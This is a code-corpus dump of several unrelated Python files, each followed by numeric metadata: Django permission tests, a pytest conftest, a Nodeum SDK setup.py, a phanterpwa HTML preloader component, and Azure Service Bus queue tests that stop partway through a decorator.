self.assertFalse(self.permission.has_object_permission(request, self.view, obj))
def test_has_permission_success_for_safe_methods(self):
for method in permissions.SAFE_METHODS:
request = MagicMock(method='GET', user=self.creator1)
self.assertTrue(self.permission.has_permission(request, self.view))
def test_has_permission_success_for_unsafe_methods(self):
for method in ['POST', 'PUT', 'DELETE']:
request = MagicMock(method='POST', user=self.creator1)
self.assertTrue(self.permission.has_permission(request, self.view))
def test_has_permission_failure_for_unsafe_methods(self):
for method in ['POST', 'PUT', 'DELETE']:
request = MagicMock(method='POST', user=self.creator2, data = {
'id': self.content.id
})
self.assertFalse(self.permission.has_permission(request, self.view)) | 38.413333 | 92 | 0.638667 | 629 | 5,762 | 5.683625 | 0.131955 | 0.063776 | 0.033566 | 0.083916 | 0.866573 | 0.862098 | 0.844755 | 0.844755 | 0.844755 | 0.844755 | 0 | 0.014046 | 0.246269 | 5,762 | 150 | 93 | 38.413333 | 0.809118 | 0 | 0 | 0.770492 | 0 | 0 | 0.08971 | 0 | 0 | 0 | 0 | 0 | 0.098361 | 1 | 0.131148 | false | 0.032787 | 0.040984 | 0 | 0.188525 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
da602a6f8e67ebec4fd2556439f9720a07d8cbff | 148 | py | Python | tests/conftest.py | domibydzovsky/wagtail-rest-pack | 821d5d4111a4a7665e50272035e90f836a2c60c2 | [
"MIT"
] | null | null | null | tests/conftest.py | domibydzovsky/wagtail-rest-pack | 821d5d4111a4a7665e50272035e90f836a2c60c2 | [
"MIT"
] | null | null | null | tests/conftest.py | domibydzovsky/wagtail-rest-pack | 821d5d4111a4a7665e50272035e90f836a2c60c2 | [
"MIT"
] | null | null | null | from django.conf import settings, global_settings
from . import settings as mysettings
def pytest_configure():
settings.configure(mysettings)
| 21.142857 | 49 | 0.804054 | 18 | 148 | 6.5 | 0.611111 | 0.239316 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.135135 | 148 | 6 | 50 | 24.666667 | 0.914063 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | true | 0 | 0.5 | 0 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
da7ecb56a164d4da7e17297c99c105c7f5be1673 | 6,827 | py | Python | setup.py | nodeum-io/nodeum-sdk-python | 205536491bff507dea7be44af46202c17e7121d9 | [
"MIT"
] | null | null | null | setup.py | nodeum-io/nodeum-sdk-python | 205536491bff507dea7be44af46202c17e7121d9 | [
"MIT"
] | null | null | null | setup.py | nodeum-io/nodeum-sdk-python | 205536491bff507dea7be44af46202c17e7121d9 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Nodeum API
The Nodeum API makes it easy to tap into the digital data mesh that runs across your organisation. Make requests to our API endpoints and we’ll give you everything you need to interconnect your business workflows with your storage. All production API requests are made to: http://nodeumhostname/api/ The current production version of the API is v1. **REST** The Nodeum API is a RESTful API. This means that the API is designed to allow you to get, create, update, & delete objects with the HTTP verbs GET, POST, PUT, PATCH, & DELETE. **JSON** The Nodeum API speaks exclusively in JSON. This means that you should always set the Content-Type header to application/json to ensure that your requests are properly accepted and processed by the API. **Authentication** All API calls require user-password authentication. **Cross-Origin Resource Sharing** The Nodeum API supports CORS for communicating from Javascript for these endpoints. You will need to specify an Origin URI when creating your application to allow for CORS to be whitelisted for your domain. **Pagination** Some endpoints such as File Listing return a potentially lengthy array of objects. In order to keep the response sizes manageable the API will take advantage of pagination. Pagination is a mechanism for returning a subset of the results for a request and allowing for subsequent requests to “page” through the rest of the results until the end is reached. Paginated endpoints follow a standard interface that accepts two query parameters, limit and offset, and return a payload that follows a standard form. These parameters names and their behavior are borrowed from SQL LIMIT and OFFSET keywords. **Versioning** The Nodeum API is constantly being worked on to add features, make improvements, and fix bugs. This means that you should expect changes to be introduced and documented. However, there are some changes or additions that are considered backwards-compatible and your applications should be flexible enough to handle them. These include: - Adding new endpoints to the API - Adding new attributes to the response of an existing endpoint - Changing the order of attributes of responses (JSON by definition is an object of unordered key/value pairs) **Filter parameters** When browsing a list of items, multiple filter parameters may be applied. Some operators can be added to the value as a prefix: - `=` value is equal. Default operator, may be omitted - `!=` value is different - `>` greater than - `>=` greater than or equal - `<` lower than - `>=` lower than or equal - `><` included in list, items should be separated by `|` - `!><` not included in list, items should be separated by `|` - `~` pattern matching, may include `%` (any characters) and `_` (one character) - `!~` pattern not matching, may include `%` (any characters) and `_` (one character) # noqa: E501
The version of the OpenAPI document: 2.1.0
Contact: info@nodeum.io
Generated by: https://openapi-generator.tech
"""
from setuptools import setup, find_packages # noqa: H301
NAME = "nodeum-sdk"
VERSION = "1.88.0"
# To install the library, run the following
#
# python setup.py install
#
# prerequisite: setuptools
# http://pypi.python.org/pypi/setuptools
REQUIRES = ["urllib3 >= 1.15", "six >= 1.10", "certifi", "python-dateutil"]
setup(
name=NAME,
version=VERSION,
description="Nodeum API",
author="Nodeum",
author_email="info@nodeum.io",
url="",
keywords=["OpenAPI", "OpenAPI-Generator", "Nodeum API"],
install_requires=REQUIRES,
packages=find_packages(exclude=["test", "tests"]),
include_package_data=True,
long_description="""\
The Nodeum API makes it easy to tap into the digital data mesh that runs across your organisation. Make requests to our API endpoints and we’ll give you everything you need to interconnect your business workflows with your storage. All production API requests are made to: http://nodeumhostname/api/ The current production version of the API is v1. **REST** The Nodeum API is a RESTful API. This means that the API is designed to allow you to get, create, update, & delete objects with the HTTP verbs GET, POST, PUT, PATCH, & DELETE. **JSON** The Nodeum API speaks exclusively in JSON. This means that you should always set the Content-Type header to application/json to ensure that your requests are properly accepted and processed by the API. **Authentication** All API calls require user-password authentication. **Cross-Origin Resource Sharing** The Nodeum API supports CORS for communicating from Javascript for these endpoints. You will need to specify an Origin URI when creating your application to allow for CORS to be whitelisted for your domain. **Pagination** Some endpoints such as File Listing return a potentially lengthy array of objects. In order to keep the response sizes manageable the API will take advantage of pagination. Pagination is a mechanism for returning a subset of the results for a request and allowing for subsequent requests to “page” through the rest of the results until the end is reached. Paginated endpoints follow a standard interface that accepts two query parameters, limit and offset, and return a payload that follows a standard form. These parameters names and their behavior are borrowed from SQL LIMIT and OFFSET keywords. **Versioning** The Nodeum API is constantly being worked on to add features, make improvements, and fix bugs. This means that you should expect changes to be introduced and documented. However, there are some changes or additions that are considered backwards-compatible and your applications should be flexible enough to handle them. These include: - Adding new endpoints to the API - Adding new attributes to the response of an existing endpoint - Changing the order of attributes of responses (JSON by definition is an object of unordered key/value pairs) **Filter parameters** When browsing a list of items, multiple filter parameters may be applied. Some operators can be added to the value as a prefix: - `=` value is equal. Default operator, may be omitted - `!=` value is different - `>` greater than - `>=` greater than or equal - `<` lower than - `>=` lower than or equal - `><` included in list, items should be separated by `|` - `!><` not included in list, items should be separated by `|` - `~` pattern matching, may include `%` (any characters) and `_` (one character) - `!~` pattern not matching, may include `%` (any characters) and `_` (one character) # noqa: E501
"""
)
| 162.547619 | 3,098 | 0.752014 | 1,039 | 6,827 | 4.930703 | 0.263715 | 0.022838 | 0.023424 | 0.010931 | 0.853211 | 0.838571 | 0.838571 | 0.838571 | 0.79797 | 0.789381 | 0 | 0.01657 | 0.169035 | 6,827 | 41 | 3,099 | 166.512195 | 0.88648 | 0.463307 | 0 | 0 | 0 | 0.052632 | 0.893359 | 0.017911 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.052632 | 0.052632 | 0 | 0.052632 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 10 |
16f8c3f97059b6dc834deb8f68b1e926295d72e8 | 3,584 | py | Python | phanterpwa/components/preloaders/android.py | PhanterJR/phanterpwa | 6daff40845b3a853cd08d319c4ce148f8deebed7 | [
"MIT"
] | 2 | 2019-06-06T10:37:01.000Z | 2021-10-16T03:36:28.000Z | phanterpwa/components/preloaders/android.py | PhanterJR/phanterpwa | 6daff40845b3a853cd08d319c4ce148f8deebed7 | [
"MIT"
] | null | null | null | phanterpwa/components/preloaders/android.py | PhanterJR/phanterpwa | 6daff40845b3a853cd08d319c4ce148f8deebed7 | [
"MIT"
] | null | null | null | import os
from ...helpers import DIV
PRELOADER = DIV(
DIV(
DIV(
DIV(
DIV(
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper left'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_gap-patch'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper right'
),
_class='spinner-layer spinner-one'
),
DIV(
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper left'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_gap-patch'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper right'
),
_class='spinner-layer spinner-two'
),
DIV(
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper left'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_gap-patch'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper right'
),
_class='spinner-layer spinner-three'
),
DIV(
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper left'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_gap-patch'
),
DIV(
DIV(
_class='phanterpwa_circle'
),
_class='phanterpwa_circle_clipper right'
),
_class='spinner-layer spinner-four'
),
_class='phanterpwa_android'
),
_class='preloader-wrapper enabled'
),
_class="preload-wrapper"),
_class="phanterpwa-components-preloaders-android"
)
PRELOADER.sass_file(
os.path.join(os.path.dirname(__file__), "android.sass")
)
PRELOADER.sass_vars = {
'STROKEWIDTH': '10px',
'CONTAINERWIDTH': '200px',
'COLOR1': 'blue',
'COLOR2': 'red',
'COLOR3': '#f4b400',
'COLOR4': 'green',
}
| 32.288288 | 64 | 0.328683 | 193 | 3,584 | 5.735751 | 0.227979 | 0.352304 | 0.379404 | 0.227642 | 0.719061 | 0.719061 | 0.70822 | 0.70822 | 0.70822 | 0.70822 | 0 | 0.00899 | 0.59654 | 3,584 | 110 | 65 | 32.581818 | 0.75657 | 0 | 0 | 0.787037 | 0 | 0 | 0.228237 | 0.066964 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.018519 | 0 | 0.018519 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
e517f40edb279457226b92e1cb826a89f7236114 | 56,916 | py | Python | sdk/servicebus/azure-servicebus/tests/test_queues.py | anuchandy/azure-sdk-for-python | 589b9890554ebf261aa2184e8f1c6507f01a207c | [
"MIT"
] | null | null | null | sdk/servicebus/azure-servicebus/tests/test_queues.py | anuchandy/azure-sdk-for-python | 589b9890554ebf261aa2184e8f1c6507f01a207c | [
"MIT"
] | null | null | null | sdk/servicebus/azure-servicebus/tests/test_queues.py | anuchandy/azure-sdk-for-python | 589b9890554ebf261aa2184e8f1c6507f01a207c | [
"MIT"
] | null | null | null | #-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import logging
import sys
import os
import pytest
import time
import uuid
from datetime import datetime, timedelta
from azure.servicebus import ServiceBusClient, QueueClient, AutoLockRenew
from azure.servicebus.common.message import Message, PeekMessage, BatchMessage, DeferredMessage
from azure.servicebus.common.constants import ReceiveSettleMode
from azure.servicebus.common.errors import (
ServiceBusError,
MessageLockExpired,
InvalidHandlerState,
MessageAlreadySettled,
AutoLockRenewTimeout,
MessageSendFailed,
MessageSettleFailed)
from devtools_testutils import AzureMgmtTestCase, RandomNameResourceGroupPreparer
from servicebus_preparer import ServiceBusNamespacePreparer, ServiceBusTopicPreparer, ServiceBusQueuePreparer
def get_logger(level):
azure_logger = logging.getLogger("azure")
if not azure_logger.handlers:
azure_logger.setLevel(level)
handler = logging.StreamHandler(stream=sys.stdout)
handler.setFormatter(logging.Formatter('%(asctime)s %(name)-12s %(levelname)-8s %(message)s'))
azure_logger.addHandler(handler)
uamqp_logger = logging.getLogger("uamqp")
if not uamqp_logger.handlers:
uamqp_logger.setLevel(logging.INFO)
uamqp_logger.addHandler(handler)
return azure_logger
_logger = get_logger(logging.DEBUG)
def print_message(message):
_logger.info("Receiving: {}".format(message))
_logger.debug("Time to live: {}".format(message.time_to_live))
_logger.debug("Sequence number: {}".format(message.sequence_number))
_logger.debug("Enqueue Sequence numger: {}".format(message.enqueue_sequence_number))
_logger.debug("Partition ID: {}".format(message.partition_id))
_logger.debug("Partition Key: {}".format(message.partition_key))
_logger.debug("User Properties: {}".format(message.user_properties))
_logger.debug("Annotations: {}".format(message.annotations))
_logger.debug("Delivery count: {}".format(message.header.delivery_count))
try:
_logger.debug("Locked until: {}".format(message.locked_until))
_logger.debug("Lock Token: {}".format(message.lock_token))
except TypeError:
pass
_logger.debug("Enqueued time: {}".format(message.enqueued_time))
# A note regarding live_test_only.
# Old servicebus tests were not written to work on both stubs and live entities.
# This disables those tests for non-live scenarios, and should be removed as tests
# are ported to offline-compatible code.
class ServiceBusQueueTests(AzureMgmtTestCase):
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer()
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_github_issue_7079(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs):
sb_client = ServiceBusClient.from_connection_string(
servicebus_namespace_connection_string, debug=False)
queue = sb_client.get_queue(servicebus_queue.name)
with queue.get_sender() as sender:
for i in range(5):
sender.send(Message("Message {}".format(i)))
messages = queue.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete, idle_timeout=5)
batch = messages.fetch_next()
count = len(batch)
messages.reconnect()
for message in messages:
_logger.debug(message)
count += 1
assert count == 5
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer()
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_github_issue_6178(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs):
sb_client = ServiceBusClient.from_connection_string(
servicebus_namespace_connection_string, debug=False)
queue = sb_client.get_queue(servicebus_queue.name)
for i in range(3):
queue.send(Message("Message {}".format(i)))
messages = queue.get_receiver(idle_timeout=60)
for message in messages:
_logger.debug(message)
_logger.debug(message.sequence_number)
_logger.debug(message.enqueued_time)
_logger.debug(message.expired)
message.complete()
time.sleep(40)
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_queue_client_conn_str_receive_handler_peeklock(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs):
queue_client = QueueClient.from_connection_string(
servicebus_namespace_connection_string,
name=servicebus_queue.name,
debug=False)
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Handler message no. {}".format(i))
message.enqueue_sequence_number = i
sender.send(message)
receiver = queue_client.get_receiver(idle_timeout=5)
count = 0
for message in receiver:
print_message(message)
assert message.message.delivery_tag is not None
assert message.lock_token == message.message.delivery_annotations.get(message._x_OPT_LOCK_TOKEN)
assert message.lock_token == uuid.UUID(bytes_le=message.message.delivery_tag)
count += 1
message.complete()
assert count == 10
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_queue_client_conn_str_receive_handler_receiveanddelete(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs):
queue_client = QueueClient.from_connection_string(
servicebus_namespace_connection_string,
name=servicebus_queue.name,
debug=False)
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Handler message no. {}".format(i))
message.enqueue_sequence_number = i
sender.send(message)
messages = []
receiver = queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete, idle_timeout=5)
for message in receiver:
messages.append(message)
with pytest.raises(MessageAlreadySettled):
message.complete()
assert not receiver.running
assert len(messages) == 10
time.sleep(30)
messages = []
receiver = queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete, idle_timeout=5)
for message in receiver:
messages.append(message)
assert len(messages) == 0
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_queue_client_conn_str_receive_handler_with_stop(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs):
queue_client = QueueClient.from_connection_string(
servicebus_namespace_connection_string,
name=servicebus_queue.name,
debug=False)
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Stop message no. {}".format(i))
sender.send(message)
messages = []
receiver = queue_client.get_receiver(idle_timeout=5)
for message in receiver:
messages.append(message)
message.complete()
if len(messages) >= 5:
break
assert receiver.running
assert len(messages) == 5
with receiver:
for message in receiver:
messages.append(message)
message.complete()
if len(messages) >= 5:
break
assert not receiver.running
assert len(messages) == 6
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_iter_messages_simple(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Iter message no. {}".format(i))
sender.send(message)
count = 0
for message in receiver:
print_message(message)
message.complete()
with pytest.raises(MessageAlreadySettled):
message.complete()
with pytest.raises(MessageAlreadySettled):
message.renew_lock()
count += 1
with pytest.raises(InvalidHandlerState):
next(receiver)
assert count == 10
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_conn_str_client_iter_messages_with_abandon(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs):
client = ServiceBusClient.from_connection_string(servicebus_namespace_connection_string, debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Abandoned message no. {}".format(i))
sender.send(message)
count = 0
for message in receiver:
print_message(message)
if not message.header.delivery_count:
count += 1
message.abandon()
else:
assert message.header.delivery_count == 1
message.complete()
assert count == 10
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
print_message(message)
message.complete()
count += 1
assert count == 0
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_iter_messages_with_defer(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
deferred_messages = []
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Deferred message no. {}".format(i))
sender.send(message)
count = 0
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 10
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
print_message(message)
message.complete()
count += 1
assert count == 0
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_client(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
deferred_messages = []
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Deferred message no. {}".format(i))
sender.send(message)
count = 0
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 10
deferred = queue_client.receive_deferred_messages(deferred_messages, mode=ReceiveSettleMode.PeekLock)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
with pytest.raises(ValueError):
message.complete()
with pytest.raises(ValueError):
queue_client.settle_deferred_messages('foo', deferred)
queue_client.settle_deferred_messages('completed', deferred)
with pytest.raises(ServiceBusError):
queue_client.receive_deferred_messages(deferred_messages)
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_complete(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
deferred_messages = []
messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
results = queue_client.send(messages, session="test_session")
assert all(result[0] for result in results)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 10
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
deferred = receiver.receive_deferred_messages(deferred_messages)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
assert message.lock_token
assert message.locked_until
assert message._receiver
message.renew_lock()
message.complete()
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deadletter(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
deferred_messages = []
messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
results = queue_client.send(messages)
assert all(result[0] for result in results)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 10
with queue_client.get_receiver(idle_timeout=5) as session:
deferred = session.receive_deferred_messages(deferred_messages)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
message.dead_letter("something")
count = 0
with queue_client.get_deadletter_receiver(idle_timeout=5) as receiver:
for message in receiver:
count += 1
print_message(message)
assert message.user_properties[b'DeadLetterReason'] == b'something'
assert message.user_properties[b'DeadLetterErrorDescription'] == b'something'
message.complete()
assert count == 10
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deletemode(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
deferred_messages = []
messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
results = queue_client.send(messages)
assert all(result[0] for result in results)
count = 0
receiver = queue_client.get_receiver(idle_timeout=5)
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 10
with queue_client.get_receiver(idle_timeout=5) as receiver:
deferred = receiver.receive_deferred_messages(deferred_messages, mode=ReceiveSettleMode.ReceiveAndDelete)
assert len(deferred) == 10
for message in deferred:
assert isinstance(message, DeferredMessage)
with pytest.raises(MessageAlreadySettled):
message.complete()
with pytest.raises(ServiceBusError):
deferred = receiver.receive_deferred_messages(deferred_messages)
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_not_found(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
deferred_messages = []
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
with queue_client.get_sender() as sender:
for i in range(3):
message = Message("Deferred message no. {}".format(i))
sender.send(message)
count = 0
for message in receiver:
deferred_messages.append(message.sequence_number)
print_message(message)
count += 1
message.defer()
assert count == 3
with pytest.raises(ServiceBusError):
deferred = queue_client.receive_deferred_messages([3, 4], mode=ReceiveSettleMode.PeekLock)
with pytest.raises(ServiceBusError):
deferred = queue_client.receive_deferred_messages([5, 6, 7], mode=ReceiveSettleMode.PeekLock)
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
@ServiceBusNamespacePreparer(name_prefix='servicebustest')
@ServiceBusQueuePreparer(name_prefix='servicebustest', dead_lettering_on_message_expiration=True)
def test_queue_by_servicebus_client_receive_batch_with_deadletter(self, servicebus_namespace, servicebus_namespace_key_name, servicebus_namespace_primary_key, servicebus_queue, **kwargs):
client = ServiceBusClient(
service_namespace=servicebus_namespace.name,
shared_access_key_name=servicebus_namespace_key_name,
shared_access_key_value=servicebus_namespace_primary_key,
debug=False)
queue_client = client.get_queue(servicebus_queue.name)
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
with queue_client.get_sender() as sender:
for i in range(10):
message = Message("Dead lettered message no. {}".format(i))
sender.send(message)
count = 0
messages = receiver.fetch_next()
while messages:
for message in messages:
print_message(message)
count += 1
message.dead_letter(description="Testing")
messages = receiver.fetch_next()
assert count == 10
with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
count = 0
for message in receiver:
print_message(message)
message.complete()
count += 1
assert count == 0
@pytest.mark.liveTest
@pytest.mark.live_test_only
@RandomNameResourceGroupPreparer(name_prefix='servicebustest')
